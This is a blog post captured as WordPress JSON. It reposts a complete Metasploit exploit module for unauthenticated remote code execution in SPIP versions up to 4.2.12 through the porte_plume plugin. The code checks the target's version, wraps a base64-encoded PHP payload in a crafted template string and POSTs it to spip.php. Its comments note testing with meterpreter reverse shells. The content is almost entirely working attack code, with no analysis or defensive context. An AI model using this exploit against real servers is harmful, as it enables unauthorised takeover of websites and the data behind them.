##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n
include Msf::Payload::Php
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘SPIP Unauthenticated RCE via porte_plume Plugin’,
‘Description’ => %q{
This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
The vulnerability occurs in SPIP\u2019s templating system where it incorrectly handles user-supplied input,
allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a
payload manipulating the templating data processed by the `echappe_retour()` function, invoking
`traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.
},
‘Author’ => [
‘Valentin Lobstein’, # Metasploit module author
‘Laluka’, # Vulnerability discovery
‘Julien Voisin’ # Review
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘URL’, ‘https:\/\/blog.spip.net\/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html’],
[‘URL’, ‘https:\/\/thinkloveshare.com\/hacking\/spip_preauth_rce_2024_part_1_the_feather’]],
‘Platform’ => [‘php’, ‘unix’, ‘linux’, ‘win’],
‘Arch’ => [ARCH_PHP, ARCH_CMD],
‘Targets’ => [
[
‘PHP In-Memory’, {
‘Platform’ => ‘php’,
‘Arch’ => ARCH_PHP
# tested with php\/meterpreter\/reverse_tcp
}
],
[
‘Unix\/Linux Command Shell’, {
‘Platform’ => [‘unix’, ‘linux’],
‘Arch’ => ARCH_CMD
# tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp
}
],
[
‘Windows Command Shell’, {
‘Platform’ => ‘win’,
‘Arch’ => ARCH_CMD
# tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp
}
]],
‘DefaultTarget’ => 0,
‘Privileged’ => false,
‘DisclosureDate’ => ‘2024-08-16’,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [REPEATABLE_SESSION],
‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]}
)
)
end<\/p>\n
def check
uri = normalize_uri(target_uri.path, ‘spip.php’)
res = send_request_cgi({ ‘uri’ => uri.to_s })<\/p>\n
return Exploit::CheckCode::Unknown(‘Target is unreachable.’) unless res
return Exploit::CheckCode::Unknown(“Target responded with unexpected HTTP response code: #{res.code}”) unless res.code == 200<\/p>\n
version_string = res.get_html_document.at(‘head\/meta[@name=”generator”]\/@content’)&.text
return Exploit::CheckCode::Unknown(‘Unable to find the version string on the page: spip.php’) unless version_string =~ \/SPIP (.*)\/<\/p>\n
version = ::Regexp.last_match(1)<\/p>\n
if version.nil? && res.headers[‘Composed-By’] =~ \/SPIP (.*) @\/
version = ::Regexp.last_match(1)
end<\/p>\n
return Exploit::CheckCode::Unknown(‘Unable to determine the version of SPIP’) unless version<\/p>\n
print_status(“SPIP Version detected: #{version}”)<\/p>\n
if Rex::Version.new(version) > Rex::Version.new(‘4.2.12’)
return CheckCode::Safe(“The detected SPIP version (#{version}) is not vulnerable.”)
end<\/p>\n
return CheckCode::Appears(“The detected SPIP version (#{version}) is vulnerable.”)
end<\/p>\n
def php_exec_cmd(encoded_payload)
dis = ‘$’ + Rex::Text.rand_text_alpha(rand(4..7))
encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
shell = <<-END_OF_PHP_CODE
#{php_preamble(disabled_varname: dis)}
$c = base64_decode(“#{encoded_clean_payload}”);
#{php_system_block(cmd_varname: ‘$c’, disabled_varname: dis)}
END_OF_PHP_CODE
return shell
end<\/p>\n
def exploit
print_status(‘Preparing to send exploit payload to the target…’)
phped_payload = target[‘Arch’] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
b64_payload = framework.encoders.create(‘php\/base64’).encode(phped_payload)
payload = “[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]”<\/p>\n
print_status(‘Sending exploit payload to the target…’)
send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘spip.php’),
‘vars_get’ => {
‘action’ => ‘porte_plume_previsu’
},
‘data’ => “data=#{payload}”
})
end<\/p>\n
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Payload::Phpinclude Msf::Exploit::Remote::HttpClientprepend Msf::Exploit::Remote::AutoCheck def initialize(info = {})super(update_info(info,‘Name’ => ‘SPIP Unauthenticated RCE via porte_plume Plugin’,‘Description’ => %q{This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.The vulnerability occurs in SPIP\u2019s templating system where it …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59087","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59087"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59087\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}